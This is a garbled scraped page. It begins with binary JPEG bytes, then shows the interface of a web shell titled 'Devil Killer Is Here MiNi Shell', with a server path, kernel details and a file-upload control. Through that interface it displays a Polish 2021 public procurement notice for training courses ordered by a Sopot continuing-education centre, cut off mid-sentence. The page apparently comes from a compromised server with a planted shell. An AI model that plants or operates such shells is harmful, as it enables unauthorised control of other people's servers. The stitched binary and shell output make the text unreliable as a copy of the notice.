JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210326/0002394901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00023949 z dnia 2021-03-26</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi edukacyjne i szkoleniowe w ramach projektu "Dobra szkoła=dobry zawód, atrakcyjna praca" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM KSZTAŁCENIA USTAWICZNEGO IM.BOHATERÓW WYBRZEŻA W SOPOCIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Małgorzata Kopacz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191896755</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 22-24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sopot</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-704</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">585510011</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyrektoradmin@ckusopot.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ckusopot.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi edukacyjne i szkoleniowe w ramach projektu "Dobra szkoła=dobry zawód, atrakcyjna praca" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2b9b4bba-8e1f-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00023949</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002155/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi edukacyjne i szkoleniowe: kurs przygotowujący do rekrutacji i pracy w liniach lotniczych (kurs Cabin Crew - kurs stewarda i stewardesy)</p> <p class="mb-0">1.3.2 Usługi edukacyjne i szkoleniowe: kurs grafiki komputerowej i tworzenia prezentacji</p> <p class="mb-0">1.3.3 Usługi edukacyjne i szkoleniowe: kurs animacji komputerowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Dobra szkoła=dobry zawód, atrakcyjna praca" </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ckusopot.nowybip.pl/zamowienia-publiczne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal poczty elektronicznej, e-mail: dyrektoradmin@ckusopot.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">(Obowiązek informacyjny Zamawiającego wobec Wykonawców będących osobami fizycznymi, którzy udostępnią swoje dane osobowe w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu oraz wobec osób trzecich (osób fizycznych), których dane Wykonawcy pozyskają bezpośrednio lub pośrednio w celu ubiegania się udzielenie zamówienia publicznego w niniejszym postępowaniu i przekażą je Zamawiającemu) Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: 	administratorem Pani/Pana danych osobowych jest: Centrum Kształcenia Ustawicznego, ul. Kościuszki 22-24, 81-704 Sopot, tel. 58 551 00 11;	inspektorem ochrony danych osobowych* w CKU jest Pani Sabina Tatol - Baczyńska , tel. 58 551 00 11 wew. 46, adres e-mail: rodo@ckusopot.pl ;	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem nr sprawy CKU.MK.261.3.2020 	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania 	Pani/Pana dane osobowe będą przechowywane do momentu wymaganego przez przepisy Ustawy PZP i przepisy prawa w zakresie zasobów archiwalnych i archiwów. 	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;	posiada Pani/Pan:−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; −	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;	nie przysługuje Pani/Panu:−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CKU.MK.261.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 40015,00 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 28015,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie kursu cabin crew dla 40 uczniów </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 12000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 305 pkt 1) w związku z art. 214 ust. 1 pkt. 7 ustawy Pzp- powtórzenie kursu cabin crew</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty zamawiający kierował się będzie następującym kryteriami i ich wagą:Dla części 1 zamówienia:a) cena brutto oferty – 60%b) doświadczenie osoby szkolącej (trenera) w prowadzeniu kursów cabin crew – 20 % c) doświadczenie zawodowe osoby szkolącej (trenera) jako stewardessa/steward w liniach lotniczych – 20%Opis zastosowanych kryteriów:a) w ramach kryterium – cena brutto, z możliwością uzyskania maksymalnie 60 punktów Zamawiający przyzna punkty stosując wzór arytmetyczny: Pkc = (Cn × W1 × 100)/Cb gdzie:Pkc - ilość punktów dla kryterium cena Cn - najniższa cena brutto, W1 – wskaźnik 0,60Cb - cena brutto badanej ofertyb) w ramach kryterium – doświadczenie trenera w prowadzeniu kursów cabin crew z możliwością uzyskania maksymalnie 20 punktów Zamawiający przyzna punkty w sposób następujący:Ocenie podlegać będzie doświadczenie 1 trenera wiodącego (wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu):doświadczenie trenera – waga 20%przeprowadzenie 3 kursów – 0 pkt.przeprowadzenie od 4 do 6 kursów – 10 pkt. przeprowadzenie 7 kursów i więcej – 20 pkt.Zamawiający oceniał będzie doświadczenie trenera na podstawie dołączonego do oferty wykazu imiennego trenerów wskazanych do realizacji zamówienia (załącznik nr 5 do SWZ). c) w ramach kryterium – doświadczenie zawodowe trenera z możliwością uzyskania maksymalnie 20 punktów Zamawiający przyzna punkty w sposób następujący:Ocenie podlegać będzie doświadczenie zawodowe 1 trenera wiodącego (wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu):doświadczenie zawodowe trenera – waga 20%doświadczenie zawodowe 2 letnie – 0 pkt.doświadczenie zawodowe od 3 lat do 5 lat – 5 pkt. doświadczenie zawodowe od 6 do 9 lat– 10 pkt.doświadczenie zawodowe 10 lat i więcej – 20 pkt.Zamawiający oceniał będzie doświadczenie trenera na podstawie dołączonego do oferty wykazu imiennego trenerów wskazanych do realizacji zamówienia (załącznik nr 5 do SWZ). UWAGA : W wykazie imiennym trenerów należy wpisać liczbę udokumentowanych lat doświadczenia zawodowego (rozumianych jako pełne lata czynne zawodowo) ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu, o którym mowa w rozdziale 6 ust. 6.1 pkt 6.1.4UWAGA:Wykonawca powinien mieć na uwadze, iż przedmiotowe kryterium oceny oferty wiąże się z warunkami udziału w postępowaniu, o których mowa w rozdziale 6 ust. 6.1 pkt 6.1.4. Wskazanie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie, obciąża Wykonawcę.Maksymalna liczba punktów do uzyskania przy uwzględnieniu obu kryteriów oceny ofert wynosi 100 i zostanie obliczona zgodnie z formułą: P = Pkc + Pkd + Pkdzgdzie:P – łączna ilość punktów dla wszystkich kryteriów Pkc – Ilość punktów dla kryterium cena brutto ofertyPkd – ilość punktów dla kryterium doświadczenie trenera w prowadzeniu kursów	Pkdz - ilość punktów dla kryterium doświadczenie zawodowe treneraZamawiający udzieli zamówienie Wykonawcy którego oferta uzyska najwyższa ilość punktów łącznie ze wszystkich kryteriów i którego oferta będzie spełniać wszystkie wymagania opisane w niniejszej swz.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osoby szkolącej (trenera) w prowadzeniu kursów cabin crew</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe osoby szkolącej (trenera) jako stewardessa/steward w liniach lotniczych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Przy wyborze oferty zamawiający kierował się będzie następującym kryteriami i ich wagą:Dla części 1 zamówienia:a) cena brutto oferty – 60%b) doświadczenie osoby szkolącej (trenera) w prowadzeniu kursów cabin crew – 20 % c) doświadczenie zawodowe osoby szkolącej (trenera) jako stewardessa/steward w liniach lotniczych – 20%Opis zastosowanych kryteriów:a) w ramach kryterium – cena brutto, z możliwością uzyskania maksymalnie 60 punktów Zamawiający przyzna punkty stosując wzór arytmetyczny: Pkc = (Cn × W1 × 100)/Cb gdzie:Pkc - ilość punktów dla kryterium cena Cn - najniższa cena brutto, W1 – wskaźnik 0,60Cb - cena brutto badanej ofertyb) w ramach kryterium – doświadczenie trenera w prowadzeniu kursów cabin crew z możliwością uzyskania maksymalnie 20 punktów Zamawiający przyzna punkty w sposób następujący:Ocenie podlegać będzie doświadczenie 1 trenera wiodącego (wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu):doświadczenie trenera – waga 20%przeprowadzenie 3 kursów – 0 pkt.przeprowadzenie od 4 do 6 kursów – 10 pkt. przeprowadzenie 7 kursów i więcej – 20 pkt.Zamawiający oceniał będzie doświadczenie trenera na podstawie dołączonego do oferty wykazu imiennego trenerów wskazanych do realizacji zamówienia (załącznik nr 5 do SWZ). c) w ramach kryterium – doświadczenie zawodowe trenera z możliwością uzyskania maksymalnie 20 punktów Zamawiający przyzna punkty w sposób następujący:Ocenie podlegać będzie doświadczenie zawodowe 1 trenera wiodącego (wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu):doświadczenie zawodowe trenera – waga 20%doświadczenie zawodowe 2 letnie – 0 pkt.doświadczenie zawodowe od 3 lat do 5 lat – 5 pkt. doświadczenie zawodowe od 6 do 9 lat– 10 pkt.doświadczenie zawodowe 10 lat i więcej – 20 pkt.Zamawiający oceniał będzie doświadczenie trenera na podstawie dołączonego do oferty wykazu imiennego trenerów wskazanych do realizacji zamówienia (załącznik nr 5 do SWZ). UWAGA : W wykazie imiennym trenerów należy wpisać liczbę udokumentowanych lat doświadczenia zawodowego (rozumianych jako pełne lata czynne zawodowo) ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu, o którym mowa w rozdziale 6 ust. 6.1 pkt 6.1.4UWAGA:Wykonawca powinien mieć na uwadze, iż przedmiotowe kryterium oceny oferty wiąże się z warunkami udziału w postępowaniu, o których mowa w rozdziale 6 ust. 6.1 pkt 6.1.4. Wskazanie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie, obciąża Wykonawcę.Maksymalna liczba punktów do uzyskania przy uwzględnieniu obu kryteriów oceny ofert wynosi 100 i zostanie obliczona zgodnie z formułą: P = Pkc + Pkd + Pkdzgdzie:P – łączna ilość punktów dla wszystkich kryteriów Pkc – Ilość punktów dla kryterium cena brutto ofertyPkd – ilość punktów dla kryterium doświadczenie trenera w prowadzeniu kursów	Pkdz - ilość punktów dla kryterium doświadczenie zawodowe treneraZamawiający udzieli zamówienie Wykonawcy którego oferta uzyska najwyższa ilość punktów łącznie ze wszystkich kryteriów i którego oferta będzie spełniać wszystkie wymagania opisane w niniejszej swz. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie kursu grafiki komputerowej i tworzenia prezentacji dla 3 nauczycieli </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 9440,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty zamawiający kierował się będzie następującym kryteriami i ich wagą:a) cena brutto oferty – 60%b) doświadczenie osoby szkolącej (trenera) – 40 % Opis zastosowanych kryteriów:a) w ramach kryterium – cena brutto, z możliwością uzyskania maksymalnie 60 punktów Zamawiający przyzna punkty stosując wzór arytmetyczny: Pkc = (Cn × W1 × 100)/Cb gdzie:Pkc - ilość punktów dla kryterium cena Cn - najniższa cena brutto, W1 – wskaźnik 0,60Cb - cena brutto badanej ofertyb) w ramach kryterium – doświadczenie trenera, który będzie brał udział w wykonywaniu zamówienia z możliwością uzyskania maksymalnie 40 punktów Zamawiający przyzna punkty w sposób następujący:Ocenie podlegać będzie doświadczenie 1 trenera wiodącego (wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu).Doświadczenie trenera – waga 40%przeprowadzenie 3 kursów – 0 pkt.przeprowadzenie od 4 do 5 kursów – 10 pkt. przeprowadzenie od 6 do 8 kursów – 20 pkt.przeprowadzenie od 9 do 11 kursów – 30 pkt.przeprowadzenie 12 kursów i więcej – 40 pkt.Zamawiający oceniał będzie doświadczenie trenera na podstawie dołączonego do oferty wykazu imiennego trenerów wskazanych do realizacji zamówienia (załącznik nr 6 do ogłoszenia) wykazane ponad doświadczenie wymagane na potwierdzenie spełnienia warunku udziału w postępowaniu, o którym mowa w rozdziale 6 ust. 6.1 pkt 6.1.4UWAGA:Wykonawca powinien mieć na uwadze, iż przedmiotowe kryterium oceny oferty wiąże się z warunkami udziału w postępowaniu, o których mowa w rozdziale 6 ust. 6.1 pkt 6.1.4. Wskazanie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie, obciąża Wykonawcę.Maksymalna liczba punktów do uzyskania przy uwzględnieniu obu kryteriów oceny ofert wynosi 100 i 